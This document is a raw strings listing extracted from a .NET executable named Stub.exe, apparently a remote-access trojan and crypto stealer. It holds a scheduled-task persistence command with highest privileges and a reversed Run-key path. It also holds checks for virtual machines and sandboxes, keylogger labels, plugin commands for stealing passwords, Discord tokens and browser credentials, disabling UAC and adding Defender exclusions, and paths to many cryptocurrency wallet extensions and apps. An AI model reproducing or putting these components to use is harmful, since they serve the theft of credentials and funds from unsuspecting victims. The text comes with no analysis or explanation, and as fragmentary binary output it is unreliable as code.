!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<Read>b__0
<Read>b__2_1
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
PcBvsgVOTBVyDA
RHkZDNXvrGA
pLDvkQxnuJA
IwiFgCplIXVgRZLA
iglYTWCTNBNA
uADFIOcwZTosIDSA
wWyKpPIXbA
vYOnHpywcA
atJuvFjeZLBgA
SystemParametersInfoA
BDEHwSNEfrA
IblCZTkccnFCB
arQSadIaEtJB
FJsSkopJQB
SsNMgNYpLAEPtRB
DOLJQYpuLIpVB
bdIvjnyyYB
BcBqROAiJtwBjB
ZnDfPKgYPRKyB
IttEcOuxXpMIC
LXKfwaBBruKC
ZZuXHTvcuZSOMC
AnfIbSjSPC
zCOxNSaRsgZC
iJyIlswafaSFcC
mGtwnxTAxHeC
ZSaRCZDvskC
aOIlGxcTtbwkC
qoMEwwcJHPoWWrC
teftGJtCzUBATDD
VtOTPtdyFD
zByyjNgSbnrHD
MapNameToOID
get_FormatID
MAvrKmKglZFFOD
hGKJJMjChhpCsbD
VPNRvbdBUsrRQDdD
OZyODqPktD
qNtaTyZEDE
tDfILDqYPLLFHE
DYqDxxXARE
OZGWLNseDvejlHYE
fFHYShKvZE
DzEIdUiotrdE
yNOAFxdfvoFsE
PGvlDuExrvE
FxVhyKZDyE
YDIOHOUnIBF
xOKcMEaJGF
NrRDAavWnHF
oswyernyXF
mHMTjRLhgnmCgF
szCJwvxCFiIDwhpF
PoWiSarPolSGyzpF
dErTOOpsuF
PopVuRHJMCPwF
zhhRKvALkKdCcNxF
OofkcXtGRuyF
byISvIrutIG
zJluBvvfaYG
WSMOFPPYSAPqYG
INQGJfeYUhfG
KHrIghNcmdShG
zOBQIZqxBQtG
XYWBVCektqfyG
koyCetatcwzG
LXpCEtVShVpCH
lzDQDbhixSszeIH
bEXSgzNGjzteOH
KjkYmFmKZCiDcTH
yMEJFxBOMyprhBFaH
XBNQdDcOEUmzdH
mEdTBxIrZeH
qsYvoooqZEpH
zHMHEPLYfRpH
dOFGfpJLePsH
get_ASCII
EEYndyjGQI
UudjPjvTbI
oNgEcTswMsI
gMuYgzzaWcFpxI
xVCIREfLCfKUJ
HddEreTedbWJ
chGWBXnqDCVbJ
bqHEPGNCqhJ
NQvAoQfZxjJ
jYCKPHmMpREK
iXbowxIAzXGK
PnyXkLRpDcZaLK
lZmhJMQCBJkMK
tNhwilvZBCPK
lnuTKGgFCnLWK
YhfdrSttdjFtK
gluNJadjjAL
ZooFTBOCjMgFL
hPEfamaEqhqzHAIL
AbwUphpvVgL
XohaCnYkJwkSrL
cMSAsfilqywL
OTjCCMXoOXABM
wUAZtgPdLRGhsYIM
ThyTFDuBnGyPAYOM
BLmCpmRXkzfrRM
CzHdZkJQDIVM
vmVEXuGTKjhM
zEZsPLaQodlhM
dIzLaeapupqM
xvTCvvCAAcnghFNsM
vomExfqIZCAN
zwDBmaJrRDN
YKszasxqWN
NqUyRQdlYN
kfxcIzKhUaaN
DZTKEmjigN
ATKhgldnjkN
SusofmkFhjAVhRoN
System.IO
BdrccSnktPO
GAcGIDwLGVQO
hiNIsVoJfAHMJpVO
TFBglxEfdMktHFOWO
QBAPteNyxcVOKYO
xpkCvTZdWcO
LMnrgdvQSmrpO
cXOlkbAeSrO
aSbmzdtbJhwO
KfpAoLiAwzCyEBP
gOQyBWjRrMP
PgfOGPNhOnTP
beuhekdhvFoOZfP
hdXzkspDLwwwjP
MJSGyFKMOmP
bsHyzMifpP
EgxIrqVLHErcrP
KAVlTUMrrQhRiRQ
LwXAIKrlKWQ
rlAXZsEoDtZQ
EaGrOfWpubQ
heAebfEfGTXmQ
fwvHvwpGrQ
YWwexADkExuQ
yoFlaTuZNxsPmywQ
cGahzRtIvBR
OhdlMlffQznmCER
wwADozGnGR
zNrrxWYocCJR
ufqvSDiiQoWFzKR
nRDXphvReTR
DmvpzQPzFRAUR
ykBKLSplEpHVR
wXPlXvwPROveR
tBsbDPxSdPqSkR
WaKJhCOwUrXerR
HEDldWrboCS
QgigPiqDDyuFS
iOKpqbslHS
PJWvsWNRxsKS
ybGoFxBVpMmPVS
DrevuQFPwRcS
HgdtQNZjOfrkS
ZFZQqbFWymijZwS
fQFQfIfknwS
HRMKJHyrEHvYDT
qvULHNgFSfpET
mHofImELPbXNT
aVQVQHcHpatqCPT
EebzvarruviT
URFMsQwCcxmT
hTdwJxQWaVInnnT
klogLADdNoT
iuOpWsslVmgCsT
YvVEtUJkeoAgsT
tZajDdvmvbduT
LjjYrJDplruT
IMRgWdEltIrtpkwT
YAUurainPYTLZzT
ZFmXUAgAXglXXU
CRZwRuxFlLYsKlU
BjgsQTTWDFhMSsU
psbhGzQOiVxvU
sitXHFmJziHyU
get_IV
set_IV
GenerateIV
zrWkEvlRCVV
jvZLwjvAjV
mroMsyyZrZjV
YBzQwIQDlIDmV
FhQHJMZkeqkuV
dEBEHxiotJW
YcDlyiRNoPKNW
OSAiFqSbRIWnNW
YRxbTpkOvLVW
UvdZBGhlslFfVW
WWoqoCGhrAvJnW
nBbbNOqTeboW
mELVukNzKhbsnmuW
PDmDmWCYzdqwW
LQGIDkCUugSrdeGnxW
aVnBpmazFNbDX
FRLfIVWFFX
OgobqAdyGX
eMljbttAYsHX
MBfuqADJlJIX
uDfbHZulozSxX
FSPlcSHYwIdzpVY
OCWLBTuRWFWY
PmnXztbaNGtBrY
HLPZIfcnWstY
kcCZEyPIfbVCZ
rrADfhvverEUDZ
DuhmHpDXKZ
WEwHFcftZaMZ
nzEIkXVwaROZ
VODyVvkcgnzdUSZ
TnejjObbUhZ
ksPvaLsqthZ
YUDazJGmaOnZ
EnpLFwkvBGtvMmqZ
XMqUtmZvNsZ
value__
ijURSIRpmQSCjzJa
lNSKvBqTzkWNa
WeBwjZDTRlQSmUa
TtsZlXfXvyZa
zADCfbCnDba
zEMSnqrVcvca
ntIRvBqyvfMHea
VrEyWOLbZnSga
hQZpWflWfga
PNPMIXAOqa
tWdUDRdQslJwa
dvInPPibopwa
JVDtjUXVUinChDza
LWtCoaJgsIHDb
hURQPxHnwBEb
oQnGsPNWlGb
thFodGqCJb
FUadxfcRpxTb
LSzKuVTcZbb
mscorlib
hnkeWMcRaHBZlb
JPxeUWjOxb
QgLwFyOelXAc
BRkEITiOkTPYEc
VDsvvkQFJAtaoKc
ODDkroWCTc
KrHAbTVUWc
QaLOjwhvNXc
VvusHxZRplHVac
GPrJpzVEjjdc
RmSgzvNBic
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
OQTdDeLhMPbOdqc
GetWindowThreadProcessId
GetProcessById
EndRead
BeginRead
Thread
SEwxytttSMbd
BLVCArpEpcd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
tEzsNTlAsSjd
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
nEnpBZvyGUZtind
CompareMethod
method
Clipboard
xKjIbhXCIBe
dxciFnUBWiaHe
GDBTlgOgGqxXqMfPe
CZlJxZEuympLQe
PIwaHypsDSe
dFHGlfvtEOSe
tihZrjnGZoUe
eMtLExOyHgXxVe
XxumgWLlxVe
eoFpRGhuYe
Replace
IsNullOrWhiteSpace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
EndInvoke
BeginInvoke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
get_ProcessName
CheckHostName
DateTime
WriteLine
get_NewLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
MulticastDelegate
GetKeyboardState
SetThreadExecutionState
SetApartmentState
GetKeyState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
igSkoEwCHRuve
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
FsIkuZHovfHBAf
TUiidxHBmXYMf
uzVdLKLiDWZNf
SizeOf
bYsvJfIiRf
KCrlPjyQhhf
OvZxmwUtdtVmjQif
jrVMQPoUoClf
mOVwfrzltf
duiRAODMqxf
WNETGGmjBg
oNniHAsOSg
dVMZndMlxgzYg
GJvNzmMVHrZefg
GVObNevwdgg
CryptoConfig
tZQzhDXkajg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
FhTlkAbgkug
IjiVLMaJDHh
CblLGgAYuhEQh
hutGQotHFih
qcBhhMfIih
JMkAxczvCUeUkh
ComputeHash
VerifyHash
zJPoDpsAIeoJth
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
EndsWith
WCXkEjvLehvgwh
cImjMtvzyh
nCUZnpRaOLzh
egSEjvFlVrMi
SwrDXYqiFdi
PmNYlLotJvRhi
UpFgyVrjlni
KIaZqatWxzFPvi
SutFDPLsrLzi
YMIYiAGkQBGj
fzlUhGydLWj
LFrXfvCgifTYj
znDuAuBbkoGcXbj
YnxGMxlcFAtcj
kLXweObOadj
SOEYujbpsbfj
cAecELvfQCUWQmjj
RuQQUhyGjnj
JesMJDQmxhNgsj
MCyMSSbVthXtwj
TBoMKfpgEmVxFk
zypoadEorCIk
uCPHkQYEtpMLk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
RegistryKeyPermissionCheck
FlushFinalBlock
yUxkNKBBMjKUkhk
kusJUsBBqKVakkjk
MRIAiwmcuZmk
WZJpvYVAieTvk
xRtXTcaKoSIswk
SPtGtptEAl
HjtXiIJjfNWl
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
lbTrPxiXUGsOxl
GeSxSzHGqXLm
BFJKxnEiMnJUm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
ttBnwpkEYPifbbm
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
PkUOATxwUujm
Random
ICryptoTransform
jOTqsyPoeQum
XMEurNutdgQn
JelouvuaVn
RcXDhqhXTahVn
dELDqpZTBZn
TcWgReQHan
ToBoolean
TimeSpan
jEqzStGYInBen
BXKUJwRkWCAin
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
pspIGrBsqvn
HDrqkApGLIuQSswn
phyfKIECjIKEFYBo
XKkCdhjVlfeKgFo
bodmsOMhyXSmIkOo
hqpxLoRwabo
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
GetLastInputInfo
RQzKsHmwfFmo
wyCXUFyDkjnto
RaKCEcHAvopkdvo
TEThTCetxzAp
EyCJfkoiOpCJTIp
BtCfnRtzTtHUp
mDqmZNxnQXeUp
MGanuyWonPmcp
aOJjNhGqYwPdp
wLQGuGBCLfZzmp
Microsoft.CSharp
LpmwWgofuQAyFtp
lxNBNixVjayp
dqzzajTlMsjzp
ZzxxYLRJAq
PGXbahQdrAq
joeBNKqfbDq
XkFLcbgZttDq
JkwqfRepBIcBSq
IJPpwJqCVTq
FKZWsWmHzrWq
dfdHICMffZq
fOtaxfjAcTtvYjq
System.Linq
euBCTejNdrtq
TtfrsskNytAmhjBr
XSlzhPgCVGFr
nyWnobQlgtPGr
qhnmyRDcliqiQr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
SpecialFolder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
WIhRRcXAHyQugr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
knlEWDbOqeCDLs
KBCIzEZxnFsApXs
System.Diagnostics
FromSeconds
GetMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
GetDirectories
ExpandEnvironmentVariables
GetTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
ehGelFKyLmfs
nhCHDfvsPzfs
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
nnFBNnpTecdsjs
ICredentials
set_Credentials
Equals
SslProtocols
GVbAUzGqsMorHNPms
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
pRcTkOgPXbxs
MKXjXtEkTpxs
wpIzlZKFNTys
BlqsTWtInsrKzs
xoBAfKEpMaOAt
HMIftQtBzgPAt
vASegMWjOeDt
EKBnSlaSIHt
iEtXDOYvSgNHt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
object
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
FqPdbxjMyDift
op_Explicit
HmAtdRxFlt
IAsyncResult
result
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
GetKeyboardLayout
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
GetText
SetText
GetWindowText
XhntUfgQKMLyt
FHCbZQsNWmVmOcDu
SsXzBpUMJpAHu
oRliCirBVBhPu
fmvfpqoBPOMPQu
aGTwoiFTSCgqYu
MPmtVpTHGZu
tglNeOLPBcbfmu
eoqQdWaccoWsu
jukoRKyRQPsyeAv
ccNjKdllTgeCv
rTAaYJgKfTnGv
nmsIVmjKGNv
KyUVOiDpfqHNv
AsvPkuBBTyuugWNv
MynVDQXJQYaPjv
GZmfpYCZFw
IVWBdIYxnKw
bMaixuZEaZw
wIlorpwApdcw
GetForegroundWindow
set_CreateNoWindow
ZQCWSeHvHWOvow
jilKRKjlpw
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
ShjthQTtGQx
AcPEDJrsRgvVcUx
jIbAknKuasix
wWhaXwYOAmx
IhjSrqXFAErx
JwyYdgWjnHnCwx
DPSHUYkOJYDy
HWkkcZEbgDy
vfwPPavFeNMCHy
UtePfuLuBDKy
InitializeArray
ToArray
get_AsArray
DGlxUwduby
swfYCQHwxHScy
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
EySOaoVDAiy
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
FxYxrCqUVlHuy
dDhzrZksufCz
ckcLqzDHAulKSZeHz
YpeOdWhyjaMoAuIz
WeArvouNXJz
mZjzUdweJbHifNz
ybZlgHpErkOz
sxPFEYoQCGSojaz
NYXSMwiprmHAOMuez
MWXFZwTmlkSMfz
wkiqvtfyYQgz
mNdXcwpCLjz
hghRVUeSJWYjz
vASQvpejmz
kerCXjfkXqz
cxrvwVwDFmhzz
iVtuSKxuKtyzz
WrapNonExceptionThrows
1.0.0.0
.NETFramework,Version=v4.6
FrameworkDisplayName
.NET Framework 4.6
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
tefWlgcATmyx+j+8JIMFJMqWlhcjg5CHabcWZZeMqQqOv4UtGIZg1sfm6BqnIjGZidBhRk/OYOMzGbgG5+bMSA==
uPrrIbqwSckYuQN7DzWQ29bjE9Tw2/SY+KUautvC0i0C2VfCLSD4HjJd1Yq4xbrgGHD5AdrGI5oRZXqkufJ8gajJsZ9rkfO9Df1/2SPVKxk=
3SpcX+DrjpABSB+T5q0a/LF++QrKooxKO1TvBONCdmYL1K0AsEAsag0JbER7DbEhgxtWN3nL9aNNbmZs3G20/a23IvJxUZZJpjf/QKcjjg4=
WzpiVpZMc2BwGd+Epc3/Krn9+P1nxSdCmYWZOxGiRzg3qoEKWOQiW4/9S2fEvgpdeuxVsJJleMd32nVRrQGFJA==
%AppData%
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
Packet
Message
LastTime
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Performance
Pastebin
Antivirus
Meta_Firefox
MetaFirefox
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Chrome
MetaChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Brave
MetaBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Meta_Edge
MetaEdge
\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Stable\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
Meta_Opera
MetaOpera
\Opera Software\Opera GX Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Software\Opera GX Stable\Local Extension Settings\chrome-extension://djclckkglechooblngghdinmeemkbgci
Meta_OperaGX
MetaOperaGX
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Chrome
PhantomChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Brave
PhantomBrave
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Chrome
BinanceChrome
\Microsoft\Edge\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Edge
BinanceEdge
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLinkChrome
Exodus_Chrome
\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
BitKeep_Chrome
BitKeepChrome
\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase_Chrome
CoinbaseChrome
\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Ronin_Chrome
RoninChrome
\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Trust_Chrome
TrustChrome
\Google\Chrome\User Data\Default\Local Extension Settings\jkjgekcefbkpogohigkgooodolhdgcda
BitPay_Chrome
BitPayChrome
\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Chrome
F2aChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Brave
F2aBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
F2a_Edge
F2aEdge
\Ergo Wallet
Ergo_Wallet
ErgoWallet
\Ledger Live
Ledger_Live
LedgerLive
\atomic
Atomic
\Exodus
Exodus
\Electrum
Electrum
\Coinomi
Coinomi
\Binance
Binance
\Bitcoin
Bitcoin_Core
Bitcoin Core
BoolWallets
\Mozilla\Firefox\Profiles
-release
\extensions\webextension@metamask.io.xpi
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\Log.tmp
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
gettxt
passload
DicordTokens
WebBrowserPass
anydesk
getscreen
WDExclusion
weburl
killps
ResetScale
KillProxy
backproxy
uacoff
Wallets
Chrome
ResetHosts
sendPlugin
Hashes
AllInOne
Password
Tokens
AVRemoval.Class1
Reset Scale succeeded!
BackProxy.Class1
wallets
\drivers\etc
\hosts.backup
\hosts
127.0.0.1
Blocked!
cmd.exe
/c taskkill.exe /im chrome.exe /f
Reset Hosts succeeded!
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0